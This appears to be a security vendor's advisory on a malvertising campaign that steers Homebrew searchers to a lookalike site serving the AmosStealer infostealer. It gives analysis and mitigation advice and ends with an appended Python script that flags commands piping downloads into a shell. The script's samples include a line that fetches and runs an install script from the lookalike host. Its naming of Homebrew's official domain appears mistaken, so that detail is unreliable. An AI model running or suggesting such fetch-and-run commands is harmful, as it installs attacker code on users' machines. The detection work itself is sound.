
January 23, 2025

Threat actors poison Homebrew with AmosStealer


Unknown threat actors have been observed abusing Google ads to trick unsuspecting users into installing an infostealer capable of stealing credentials, browser data, and cryptocurrency wallets.

The ads target Google users who are looking for the official Homebrew website. This popular open-source package manager allows macOS and Linux users to install, update, and manage software from the command line. When a Google search is conducted for ‘Homebrew’, the first result displayed is a Google ad that appears to be for the official website of Homebrew, homebrew.sh. However, the ad redirects users to a fake website hombrewe.sh.


This website looks just like Homebrew’s official site, which provides the user with a command that they can use to install Homebrew. However, if the user runs the command shown by the fake website, it downloads and executes AmosStealer. This potent malware is capable of targeting over 50 cryptocurrency extensions, desktop wallets, and other sensitive data stored in web browsers.

Figure: Fake Homebrew website displaying the command that installs AmosStealer

Google has since removed the fake ad in question. However, cybersecurity researchers are calling on Google, and other search engine ad providers, to more thoroughly vet ads before they are allowed to be posted.

Source: Bleeping Computer

Analysis

The manipulation of Search Engine Optimization (SEO) and search engine ads to deliver malware to unsuspecting users is extremely common. It seems that almost any subject a user can search for has been, or will eventually be, subject to a malicious ad. For example, a Gootloader campaign observed in November 2024 targeted users searching for oddly specific subjects such as California breakroom laws and whether Bengal cats are legal in Australia.

In May 2024, Field Effect observed a different Gootloader campaign that redirected users searching for a ‘letter of withdrawal from agreement’ template to a compromised website where users were instructed to download the template. Upon analysis, Field Effect determined that this file contained a malicious JavaScript that, when executed, installs the first stage of Gootloader malware.

The impersonation of Homebrew is ideal for threat actors because those searching for it are likely looking for the necessary command to install it. We expect this is also why the threat actor chose to display the command required to download and install AmosStealer the same way Homebrew displays the command for the legitimate executable.

Fortunately, Google removed the ad in question, effectively stopping this particular attack vector. However, until search engines improve their ad vetting process, threat actors will likely continue abusing this attack vector for other search subjects.

Mitigation

Field Effect MDR users are automatically alerted when activity related to infostealer malware is detected in their environments. These AROs should be reviewed via the Field Effect Portal as soon as possible.

To lessen the impact of the risk posed by the malicious manipulation of SEO and search engine ads, Field Effect encourages users to:

  • Keep their browser up to date;
  • Configure anti-virus solutions to automatically scan files downloaded by browsers;
  • Avoid visiting suspicious websites and adhere to any security notifications displayed by the browser (e.g. expired website certificates, insecure connections, etc.);
  • Rely on official, reputable sources when downloading content such as templates and samples; and
  • Scrutinize the actual URL of the ad intended to be followed by hovering over it before clicking it.
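The last two recommendations can be partly automated on the endpoint. The script below is an added example written for this note; it is not Field Effect's code or part of the Homebrew project. It reviews shell command lines (the kind an EDR or shell-history collector would forward) and flags two things the attack relies on: a command that pipes remote content straight into a shell, and a download host that is a near-miss of a known legitimate domain. The allowlist, the edit-distance threshold and the sample command lines are constructed for illustration; only homebrew.sh and hombrewe.sh are names taken from the article.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist of hosts an organisation trusts to serve installers.
# homebrew.sh is the domain named in the article; the others are assumptions.
LEGIT_HOSTS = {"homebrew.sh", "github.com", "raw.githubusercontent.com"}

# Constructed sample command lines; the second mirrors the fake site's pattern.
SAMPLE_COMMANDS = [
    '/bin/bash -c "$(curl -fsSL https://homebrew.sh/install.sh)"',
    'curl -fsSL https://hombrewe.sh/install.sh | bash',
    'ls -la',
]

URL_RE = re.compile(r'https?://[^\s"\')<>|]+')
# curl/wget output piped into a shell, e.g. "curl ... | sudo bash"
PIPE_TO_SHELL_RE = re.compile(r'\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b')
# curl/wget output executed via command substitution, e.g. bash -c "$(curl ...)"
CMD_SUBST_RE = re.compile(r'\$\(\s*(curl|wget)\b')


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; small distances indicate a typosquat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def host_of(url: str) -> str:
    """Return the lower-cased hostname of a URL (scheme assumed if missing)."""
    parsed = urlparse(url if "://" in url else "http://" + url)
    return (parsed.hostname or "").lower()


def classify_host(host: str, allowlist=LEGIT_HOSTS, max_dist: int = 2) -> str:
    """allowlisted, lookalike of <legit host>, or unknown."""
    if host in allowlist:
        return "allowlisted"
    close = [h for h in allowlist if levenshtein(host, h) <= max_dist]
    if close:
        nearest = min(close, key=lambda h: levenshtein(host, h))
        return f"lookalike of {nearest}"
    return "unknown"


def review_command(cmd: str) -> dict:
    """Flag remote-content-to-shell execution from non-allowlisted hosts."""
    remote_exec = bool(PIPE_TO_SHELL_RE.search(cmd) or CMD_SUBST_RE.search(cmd))
    hosts = [(host_of(u), classify_host(host_of(u))) for u in URL_RE.findall(cmd)]
    if remote_exec and any(v != "allowlisted" for _, v in hosts):
        verdict = "alert"      # remote code run from an unknown or lookalike host
    elif remote_exec:
        verdict = "review"     # allowlisted host, but still worth a second look
    else:
        verdict = "ok"
    return {"remote_exec": remote_exec, "hosts": hosts, "verdict": verdict}


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(review_command(cmd)["verdict"], "<-", cmd)
```

The edit-distance check is deliberately loose (distance 2 catches hombrewe.sh against homebrew.sh) because typosquats are cheap to register; in practice the allowlist would be the organisation's own list of approved installer sources rather than the three hosts assumed here.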
